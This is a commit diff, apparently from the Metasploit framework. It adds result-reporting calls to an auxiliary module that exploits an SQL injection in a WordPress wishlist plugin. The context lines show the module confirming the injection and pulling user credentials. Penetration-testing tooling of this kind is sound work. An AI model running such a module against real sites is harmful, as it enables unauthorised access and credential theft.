Add report_host, report_service and report_vuln

rapid7 · Oct 3, 2024 · d6b7a4c · d6b7a4c
1 parent a90214c
commit d6b7a4c
Showing 1 changed file with 20 additions and 0 deletions.
diff --git a/modules/auxiliary/scanner/http/wp_ti_woocommerce_wishlist_sqli.rb b/modules/auxiliary/scanner/http/wp_ti_woocommerce_wishlist_sqli.rb
@@ -101,8 +101,28 @@ def run_host(_ip)
 
     if @sqli.test_vulnerable
       print_status('SQL Injection successful, retrieving user credentials...')
+
       wordpress_sqli_initialize(@sqli)
       wordpress_sqli_get_users_credentials(datastore['COUNT'])
+
+      report_host(host: ip)
+
+      report_service(
+        host: ip,
+        port: rport,
+        proto: 'tcp',
+        name: fullname,
+        info: description.strip
+      )
+
+      report_vuln(
+        host: ip,
+        port: rport,
+        proto: 'tcp',
+        name: fullname,
+        refs: references,
+        info: description.strip
+      )
     else
       fail_with(Failure::NotVulnerable, 'Target is not vulnerable to SQL injection.')
     end